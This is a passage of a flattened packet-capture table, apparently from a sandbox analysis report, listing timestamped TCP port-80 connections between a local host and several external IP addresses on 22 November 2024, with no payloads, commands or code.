                                                                                                                          Nov 22, 2024 15:13:23.672005892 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.672019005 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.672068119 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.672113895 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.672224998 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.672239065 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:23.672283888 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:24.852082968 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:24.852154016 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:24.852296114 CET4994480192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:24.932869911 CET8049944161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:24.932928085 CET4994480192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:25.067965984 CET4994480192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:26.088725090 CET4995180192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:26.208838940 CET8049951161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:26.208935976 CET4995180192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:26.245233059 CET4995180192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:26.365673065 CET8049951161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:27.623074055 CET8049951161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:27.623101950 CET8049951161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:27.623114109 CET8049951161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:27.623127937 CET8049951161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:27.623260975 CET4995180192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:27.630239010 CET4995180192.168.2.4161.97.142.144
                                                                                                                          Nov 22, 2024 15:13:27.750014067 CET8049951161.97.142.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:33.555138111 CET4996980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:33.678841114 CET804996935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:33.678939104 CET4996980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:33.694235086 CET4996980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:33.813765049 CET804996935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:35.208810091 CET4996980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:35.226351976 CET804996935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:35.226686954 CET804996935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:35.228786945 CET4996980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:35.228786945 CET4996980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:35.328274012 CET804996935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:35.328443050 CET4996980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:36.228735924 CET4997580192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:36.348588943 CET804997535.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:36.348671913 CET4997580192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:36.365066051 CET4997580192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:36.485749006 CET804997535.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:37.882256031 CET4997580192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:37.935635090 CET804997535.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:37.935703039 CET804997535.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:37.935818911 CET4997580192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:37.935818911 CET4997580192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:38.001816034 CET804997535.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:38.002085924 CET4997580192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:38.899576902 CET4998180192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:39.019437075 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.019535065 CET4998180192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:39.033026934 CET4998180192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:39.152862072 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.152892113 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.152973890 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.152990103 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.153052092 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.153098106 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.153168917 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.153187990 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:39.153228045 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:40.536807060 CET4998180192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:40.565495014 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:40.565568924 CET4998180192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:40.658556938 CET804998135.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:40.658626080 CET4998180192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:41.555692911 CET4998980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:41.676389933 CET804998935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:41.676619053 CET4998980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:41.686280012 CET4998980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:41.805705070 CET804998935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:43.188049078 CET804998935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:43.188133001 CET804998935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:43.188232899 CET4998980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:43.191978931 CET4998980192.168.2.435.220.176.144
                                                                                                                          Nov 22, 2024 15:13:43.311777115 CET804998935.220.176.144192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:49.223150015 CET5000780192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:49.342824936 CET8050007101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:49.343000889 CET5000780192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:49.356738091 CET5000780192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:49.478080988 CET8050007101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:50.825798035 CET8050007101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:50.825931072 CET8050007101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:50.825983047 CET5000780192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:50.865106106 CET5000780192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:51.910887003 CET5001380192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:52.107568979 CET8050013101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:52.110739946 CET5001380192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:52.126336098 CET5001380192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:52.351279974 CET8050013101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:53.593094110 CET8050013101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:53.593246937 CET8050013101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:53.593456984 CET5001380192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:53.633696079 CET5001380192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:54.758420944 CET5001980192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:54.878412962 CET8050019101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:54.878510952 CET5001980192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:54.894814014 CET5001980192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:55.015367985 CET8050019101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:55.015413046 CET8050019101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:55.015532970 CET8050019101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:55.015546083 CET8050019101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:55.015707970 CET8050019101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:55.015750885 CET8050019101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:55.015851974 CET8050019101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:55.015875101 CET8050019101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:55.015952110 CET8050019101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:56.396595955 CET5001980192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:56.517894983 CET8050019101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:56.517983913 CET5001980192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:57.414983034 CET5002680192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:57.534573078 CET8050026101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:13:57.535335064 CET5002680192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:57.544239998 CET5002680192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:13:57.663672924 CET8050026101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:02.130707026 CET8050026101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:02.130970955 CET8050026101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:02.131160021 CET5002680192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:14:02.133718014 CET5002680192.168.2.4101.35.209.183
                                                                                                                          Nov 22, 2024 15:14:02.253232002 CET8050026101.35.209.183192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:07.485032082 CET5003680192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:07.604743004 CET8050036108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:07.608467102 CET5003680192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:07.625039101 CET5003680192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:07.744863033 CET8050036108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:08.862458944 CET8050036108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:08.863389969 CET8050036108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:08.863404989 CET8050036108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:08.863435984 CET5003680192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:08.863467932 CET5003680192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:09.131416082 CET5003680192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:10.149688005 CET5003780192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:10.269339085 CET8050037108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:10.269407988 CET5003780192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:10.286286116 CET5003780192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:10.406013966 CET8050037108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:11.689364910 CET8050037108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:11.689763069 CET8050037108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:11.689857006 CET8050037108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:11.690277100 CET5003780192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:11.802388906 CET5003780192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:12.821731091 CET5003880192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:12.942274094 CET8050038108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:12.942372084 CET5003880192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:12.959923029 CET5003880192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:13.081130028 CET8050038108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:13.081140995 CET8050038108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:13.081243038 CET8050038108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:13.081253052 CET8050038108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:13.081322908 CET8050038108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:13.081331968 CET8050038108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:13.081402063 CET8050038108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:13.081446886 CET8050038108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:13.081506968 CET8050038108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:14.474286079 CET5003880192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:14.752383947 CET8050038108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:14.752394915 CET8050038108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:14.752449036 CET5003880192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:14.752449036 CET5003880192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:14.753691912 CET8050038108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:14.753737926 CET5003880192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:14.779774904 CET8050038108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:14.779815912 CET5003880192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:15.493051052 CET5003980192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:15.613795042 CET8050039108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:15.614109993 CET5003980192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:15.626375914 CET5003980192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:15.746205091 CET8050039108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:17.012893915 CET8050039108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:17.012943029 CET8050039108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:17.012979031 CET8050039108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:17.013222933 CET5003980192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:17.016410112 CET5003980192.168.2.4108.181.189.7
                                                                                                                          Nov 22, 2024 15:14:17.136071920 CET8050039108.181.189.7192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:22.643011093 CET5004080192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:22.762547970 CET8050040209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:22.762667894 CET5004080192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:22.778987885 CET5004080192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:22.898699045 CET8050040209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:24.036556959 CET8050040209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:24.036676884 CET8050040209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:24.036794901 CET5004080192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:24.286844015 CET5004080192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:25.306361914 CET5004180192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:25.426203012 CET8050041209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:25.426374912 CET5004180192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:25.442375898 CET5004180192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:25.564513922 CET8050041209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:26.649337053 CET8050041209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:26.650129080 CET8050041209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:26.650182009 CET5004180192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:26.943526030 CET5004180192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:27.963331938 CET5004280192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:28.083120108 CET8050042209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:28.083318949 CET5004280192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:28.102400064 CET5004280192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:28.222126961 CET8050042209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:28.222152948 CET8050042209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:28.222176075 CET8050042209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:28.222184896 CET8050042209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:28.222230911 CET8050042209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:28.222326040 CET8050042209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:28.222337008 CET8050042209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:28.222348928 CET8050042209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:28.222361088 CET8050042209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:29.389961958 CET8050042209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:29.390171051 CET8050042209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:29.394083977 CET5004280192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:29.627295017 CET5004280192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:30.634624958 CET5004380192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:30.754226923 CET8050043209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:30.754379034 CET5004380192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:30.770644903 CET5004380192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:30.890431881 CET8050043209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:31.979356050 CET8050043209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:31.979665041 CET8050043209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:31.982652903 CET5004380192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:31.985536098 CET5004380192.168.2.4209.74.77.107
                                                                                                                          Nov 22, 2024 15:14:32.107836962 CET8050043209.74.77.107192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:37.523736954 CET5004480192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:37.645442963 CET805004477.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:37.648857117 CET5004480192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:37.663618088 CET5004480192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:37.784454107 CET805004477.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:38.981838942 CET805004477.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:38.981887102 CET805004477.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:38.981940985 CET5004480192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:39.177716970 CET5004480192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:40.197110891 CET5004580192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:40.316720009 CET805004577.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:40.316806078 CET5004580192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:40.334255934 CET5004580192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:40.453948021 CET805004577.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:41.596782923 CET805004577.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:41.597006083 CET805004577.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:41.597183943 CET5004580192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:41.850409985 CET5004580192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:42.869390011 CET5004680192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:42.989006996 CET805004677.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:42.989135981 CET5004680192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:43.013545990 CET5004680192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:43.133641005 CET805004677.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:43.133655071 CET805004677.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:43.133682966 CET805004677.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:43.133692026 CET805004677.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:43.133744001 CET805004677.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:43.133791924 CET805004677.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:43.133874893 CET805004677.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:43.133884907 CET805004677.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:43.133918047 CET805004677.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:44.365354061 CET805004677.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:44.365459919 CET805004677.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:44.365561008 CET5004680192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:44.521393061 CET5004680192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:45.542424917 CET5004780192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:45.662209988 CET805004777.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:45.662534952 CET5004780192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:45.674417973 CET5004780192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:45.794049978 CET805004777.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:46.997927904 CET805004777.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:46.997987986 CET805004777.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:46.998115063 CET5004780192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:47.002394915 CET5004780192.168.2.477.68.64.45
                                                                                                                          Nov 22, 2024 15:14:47.122344017 CET805004777.68.64.45192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:53.304405928 CET5004880192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:14:53.424355984 CET8050048146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:53.424679995 CET5004880192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:14:53.440560102 CET5004880192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:14:53.560194969 CET8050048146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:54.943252087 CET5004880192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:14:55.008775949 CET8050048146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:55.008841991 CET5004880192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:14:55.008969069 CET8050048146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:55.009047985 CET5004880192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:14:55.062787056 CET8050048146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:55.062845945 CET5004880192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:14:55.962435007 CET5004980192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:14:56.085493088 CET8050049146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:56.085650921 CET5004980192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:14:56.102432966 CET5004980192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:14:56.222843885 CET8050049146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:57.406168938 CET8050049146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:57.406197071 CET8050049146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:57.406336069 CET5004980192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:14:57.618438959 CET5004980192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:14:58.634748936 CET5005080192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:14:58.754395962 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.754503012 CET5005080192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:14:58.773452997 CET5005080192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:14:58.893182039 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.893204927 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.893224955 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.893238068 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.893300056 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.893311977 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.893366098 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.893410921 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:14:58.893439054 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:15:00.164673090 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:15:00.164900064 CET8050050146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:15:00.170592070 CET5005080192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:15:00.290482998 CET5005080192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:15:01.307059050 CET5005180192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:15:01.426564932 CET8050051146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:15:01.428967953 CET5005180192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:15:01.441237926 CET5005180192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:15:01.560856104 CET8050051146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:15:02.766300917 CET8050051146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:15:02.766333103 CET8050051146.88.233.115192.168.2.4
                                                                                                                          Nov 22, 2024 15:15:02.766453981 CET5005180192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:15:02.771516085 CET5005180192.168.2.4146.88.233.115
                                                                                                                          Nov 22, 2024 15:15:02.891127110 CET8050051146.88.233.115192.168.2.4
                                                                                                                          TimestampSource PortDest PortSource IPDest IP
